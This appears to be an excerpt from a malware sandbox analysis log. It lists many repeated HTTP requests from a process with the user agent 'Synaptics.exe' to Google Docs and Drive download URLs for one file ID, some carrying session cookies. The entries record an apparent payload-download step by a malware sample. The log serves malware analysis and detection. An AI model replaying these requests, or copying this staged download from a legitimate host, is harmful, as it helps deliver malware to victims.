                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
